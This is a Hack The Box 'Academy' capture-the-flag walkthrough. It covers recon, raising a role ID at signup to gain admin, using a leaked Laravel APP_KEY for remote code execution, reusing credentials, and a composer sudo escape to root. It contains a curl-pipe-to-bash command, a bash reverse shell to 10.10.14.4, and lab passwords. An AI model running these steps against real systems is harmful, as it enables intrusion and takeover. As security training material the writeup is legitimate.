Academy

Name: Academy
Release Date: 07 Nov 2020
Retire Date: 27 Feb 2021
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
snowscan 00 days, 02 hours, 21 mins, 04 seconds
jkr 00 days, 02 hours, 47 mins, 31 seconds
Creator: egre55
mrb3n
Pentest Workshop PDF: Academy.pdf

I'm going to switch things up here and use AutoRecon instead of just nmap.  AutoRecon is an exceptionally powerful tool best used on full subnets (like an Enterprise Network or <hint hint> the OSCP labs and exam).  So, after running AutoRecon and getting the results, I go ahead and import it into Pentest Workshop (~$300 US a year, but definitely worth the price if you do a lot of pentesting, CTF writeups, etc.). 

 

So, we now start off with 'python3 ../AutoRecon/src/autorecon/autorecon.py 10.10.10.215'  Now, AutoRecon does take a little bit longer than a traditional nmap scan, but checks a lot more too.  That last task took forever to finish.  The results look something like:

 
[*] Scanning target 10.10.10.215
/home/kali/Academy/../AutoRecon/src/autorecon/autorecon.py:503: DeprecationWarning: The explicit passing of coroutine objects to 
asyncio.wait() is deprecated since Python 3.8, and scheduled for removal in Python 3.11.
  done, pending = await asyncio.wait(pending, return_when=FIRST_COMPLETED)
[*] Running service detection nmap-top-20-udp on 10.10.10.215                                               
[*] Running service detection nmap-quick on 10.10.10.215                                                    
[*] Running service detection nmap-full-tcp on 10.10.10.215                                                 
[!] Service detection nmap-top-20-udp on 10.10.10.215 returned non-zero exit code: 1
[*] Service detection nmap-quick on 10.10.10.215 finished successfully in 20 seconds
[*] Found ssh on tcp/22 on target 10.10.10.215
[*] Found http on tcp/80 on target 10.10.10.215
[*] Running task tcp/22/sslscan on 10.10.10.215
[*] Running task tcp/22/nmap-ssh on 10.10.10.215
[*] Running task tcp/80/sslscan on 10.10.10.215
[*] Running task tcp/80/nmap-http on 10.10.10.215
[*] Running task tcp/80/curl-index on 10.10.10.215
[*] Running task tcp/80/curl-robots on 10.10.10.215
[*] Running task tcp/80/wkhtmltoimage on 10.10.10.215
[*] Running task tcp/80/whatweb on 10.10.10.215
[*] Running task tcp/80/nikto on 10.10.10.215
/home/kali/Academy/../AutoRecon/src/autorecon/autorecon.py:281: DeprecationWarning: The explicit passing of coroutine objects to 
asyncio.wait() is deprecated since Python 3.8, and scheduled for removal in Python 3.11.
  await asyncio.wait([
[*] Task tcp/22/sslscan on 10.10.10.215 finished successfully in less than a second
[*] Task tcp/80/sslscan on 10.10.10.215 finished successfully in less than a second
[*] Task tcp/80/wkhtmltoimage on 10.10.10.215 finished successfully in less than a second
[*] Running task tcp/80/gobuster on 10.10.10.215
[*] Task tcp/80/curl-index on 10.10.10.215 finished successfully in less than a second
[*] Task tcp/80/curl-robots on 10.10.10.215 finished successfully in less than a second
[*] Task tcp/22/nmap-ssh on 10.10.10.215 finished successfully in 5 seconds
[*] Task tcp/80/nmap-http on 10.10.10.215 finished successfully in 36 seconds
[*] [09:13:19] - There are 4 tasks still running on 10.10.10.215                                            
[*] Task tcp/80/whatweb on 10.10.10.215 finished successfully in 47 seconds
[*] [09:14:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] [09:15:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] [09:16:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] [09:17:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] [09:18:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] [09:19:19] - There are 3 tasks still running on 10.10.10.215                                            
[*] Task tcp/80/gobuster on 10.10.10.215 finished successfully in 6 minutes, 48 seconds
[*] [09:20:19] - There are 2 tasks still running on 10.10.10.215                                            
[*] [09:21:19] - There are 2 tasks still running on 10.10.10.215                                            
[*] Task tcp/80/nikto on 10.10.10.215 finished successfully in 9 minutes, 23 seconds
[*] [09:22:19] - There is 1 task still running on 10.10.10.215                                              
[*] [09:23:19] - There is 1 task still running on 10.10.10.215                                              
[*] [09:24:19] - There is 1 task still running on 10.10.10.215 

[*] [10:23:42] - There is 1 task still running on 10.10.10.215
[*] [10:24:49] - There is 1 task still running on 10.10.10.215
[*] [10:25:54] - There is 1 task still running on 10.10.10.215
[*] [10:26:58] - There is 1 task still running on 10.10.10.215
[*] [10:28:14] - There is 1 task still running on 10.10.10.215
[*] Service detection nmap-full-tcp on 10.10.10.215 finished successfully in 1 hour, 16 minutes, 33 seconds
[*] Found socks5 on tcp/33060 on target 10.10.10.215
[*] Running task tcp/33060/sslscan on 10.10.10.215
[*] Task tcp/33060/sslscan on 10.10.10.215 finished successfully in less than a second
[*] Finished scanning target 10.10.10.215 in 1 hour, 16 minutes, 34 seconds
[*] Finished scanning all targets in 1 hour, 16 minutes, 34 seconds!

An hour, 16 minutes and 34 seconds to complete.  I told you AutoRecon takes longer.  One of the first things we notice is that there is a webserver running.  Apache httpd 2.4.41 (Ubuntu).  However, Navigating to it brings up a search instead of the webserver's page.  Add '10.10.10.215 academy.htb' to your /etc/hosts file.  Now we can navigate to academy.htb and get a login page.

We can tell that the site is using PHP and the location of the Login and Register Links by viewing the page source.

We want to see what is happening when a new user is created. So, I'm going to fire up Burp Suite.  Now, I am using Kali 2021.1 which has a newer version of Burp that has a built-in browser.  No more having to modify your browser's network settings or installing certificates.  In that browser, I'm going to create a new user name johndoe with a password of johndoe1 and capture what is happening when a new user gets created.

After we create the user, it takes us to the Login page.  We can use the new credentials to login and we see some Modules for the HackTheBox Academy (Nice Touch.  It's usually the whole Lorem Ipsum thing). One thing the capture on creation shows us is an "&roleid=0".  That variable might be useful later.  For now, let's run Gobuster on it and see what else is there for us to find.  We can do that with "gobuster dir -u http://academy.htb -w /usr/share/dirb/wordlists/common.txt"

 
┌──(kali㉿kali)-[~/Academy]
└─$ gobuster dir -u http://academy.htb -w /usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://academy.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/07 11:25:59 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin.php (Status: 200)
/images (Status: 301)
/index.php (Status: 200)
/server-status (Status: 403)
===============================================================
2021/03/07 11:26:39 Finished
===============================================================

Ah HA! We found an admin.php page.  We can't log into it with johndoe.  Let's create another user, johndoe2, but this time capture the request and change that roleid to 1 and see what happens.

Logging into the standard page doesn't change anything, but now we log into the admin.php page.

So there's another subdomain located at dev-staging-01.academy.htb.  We'll need to add that to our /etc/hosts file too.  Then we can navigate to it.

Now we're getting somewhere. Now we know Laravel is running with an APP_KEY of "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=" and a mysql DB with an instance named homestead, a username of homestead, and a password of secret.

A quick searchsploit later and we find a Laravel 5.X exploit located https://www.exploit-db.com/exploits/47129 that looks promising.  Unfortunately, it's a Metasploit exploit, but I'm sure we can work around that.

We get around that by using aljavier's pwn_laravel script.  Run "git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133" in your working directory.  I will need that APP_KEY from earlier.  Since I am using AutoRecon for the scans, it creates an exploits folder inside the "results" working folder for the host.  I placed my copy of the cloned repo in there.  Next, we need to install the requirements and run it.

 
pip3 install -r requirements.txt
Requirement already satisfied: colorama==0.4.4 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (0.4.4)
Collecting commonmark==0.9.1
  Downloading commonmark-0.9.1-py2.py3-none-any.whl (51 kB)
     |████████████████████████████████| 51 kB 1.5 MB/s 
Collecting Pygments==2.7.2
  Downloading Pygments-2.7.2-py3-none-any.whl (948 kB)
     |████████████████████████████████| 948 kB 1.7 MB/s 
Collecting rich==9.2.0
  Downloading rich-9.2.0-py3-none-any.whl (164 kB)
     |████████████████████████████████| 164 kB 1.6 MB/s 
Requirement already satisfied: typing-extensions==3.7.4.3 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 5)) (3.7.4.3)
Collecting pycryptodome==3.9.9
  Downloading pycryptodome-3.9.9-cp39-cp39-manylinux1_x86_64.whl (13.7 MB)
     |████████████████████████████████| 13.7 MB 763 kB/s 
Requirement already satisfied: requests==2.25.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 7)) (2.25.1)
Installing collected packages: commonmark, Pygments, rich, pycryptodome
  WARNING: The script cmark is installed in '/home/kali/.local/bin' which is not on PATH.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
  WARNING: The script pygmentize is installed in '/home/kali/.local/bin' which is not on PATH.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed Pygments-2.7.2 commonmark-0.9.1 pycryptodome-3.9.9 rich-9.2.0

└─$ python3 pwn_laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= --interactive

Linux academy 5.4.0-52-generic #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

 Running in interactive mode. Press CTRL+C to exit.
$ curl http://10.10.14.4 |bash

Before you run the curl statement at the end of the above code block, make sure you do a few things on your machine first.

 

One Terminal: Run the

 

"python3 pwn_laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= --interactive"

 

command to get the low level interactive shell.

 

A Second Terminal: Run

 

"echo 'bash - i >& /dev/tcp/10.10.14.4/4444 0>&1' > index.html"

sudo python3 -m http.server 80

 

In a Third Terminal: Run

 

nc -lvnp 4444

 

Then, in the first Terminal window where the low-level shell is running, you can run the:

 

curl http://10.10.14.4 | bash

 

This will call your HTTP server's index.html file and pipe it into bash, which then kicks off the Netcat callback for a full TTY shell (You can find more screenshots of the steps in the Pentest Workshop PDF).  The www-data user generally can't do much so let's check around and see what else we can find.  I mean, we do have a mysql instance called homestead on staging, let's see if we can pull the same ENV information on Production.

If we try to log into MySQL with mySup3rP4s5w0rd!!, we of course fail.  It couldn't have been that easy.  So, let's try just a password reuse thing.  Anybody with that lame of a password has got to be just this shy of crazy enough to reuse it, right?  Problem is, who's the one to try???  Easy.  "cat /etc/passwd" to get the user list.

So, most of those are the usual default accounts, but there are a few interesting ones.

 

egre55

mrb3n

cry0l1t3

21y4d

ch4p

g0blin

 

There's a few ways we can do this.  We can run a user list of those 6 with a static password and script it, or we can immediately narrow it down to 3 possibilities.  egre55 was what showed in the left corner after creating johndoe.  Chance's are that it won't be him.  My guess would be either m4b3n (the other creator) or this cry0l1t3 account.  I'll try those first.  Sure enough, cyr0l1t3 was my target.

Well there is an interesting item.  cry0l1t3 is in the adm group, which in Linux administration, is typically allowed to view logs.  Change to the /var/log folder and see what we have.

Another bit of interesting.  Audit Logging is enabled. Let's check the main Audit log, using aureport, and see if there are any other nuggets of info we can use.

Sorry mrb3n, but we just stole your credentials :D 

 

Username: mrb3n

Password: mrb3n_Ac@d3my!

 

Time to create/utilize a "save point".  We can SSH to the box with those credentials.  So, if anything funky was to happen, we've got an easy way in without having to start from scratch.  So, what can mrb3n do.  sudo -l shows the account can run sudo on composer!  Composer is one of the GTFObins!! 

So, how do we exploit this GTFObin, you ask?  Simple.  3 Easy Steps.

 

1) TF=$(mktemp -d)

2) echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json

3) sudo composer --working-dir=$TF run-script x

 

Follow these three steps and "You are Root"

Congratulations!  Now go grab an adult beverage and enjoy :D